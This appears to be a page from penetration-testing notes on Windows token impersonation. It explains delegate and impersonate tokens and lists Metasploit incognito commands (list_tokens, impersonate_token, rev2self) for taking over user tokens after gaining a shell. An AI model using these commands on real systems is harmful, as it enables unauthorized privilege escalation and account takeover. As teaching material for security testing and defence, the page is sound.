Token Impersonation

Permissions: User Permissions

What are tokens?

Temporary Keys that allow you to access to a system/network without having to provide credentials each time you access a file.
Think cookies but in this case for computers.

Types of Tokens

Delegate Token - Create for logging into a machine or using Remote Desktop.
Impersonate Token - Basically is a "non-interactive". Such as attaching a network drive or a domain logon script.

Execution

Metasploit

Once you have a shell session open, type the following commands.

list_tokens -u   // List's all the user tokens on a machine

load incognito   // load the tool built-in metasploit 

impersonate_token <domian>\\<user> // impersonate the user token

rev2self  // if you have any problems executing programs like hashdump

PreviousPrivilege Escalation NextPrint Nightmare (CVE-2021-1675)

Last updated 1 year ago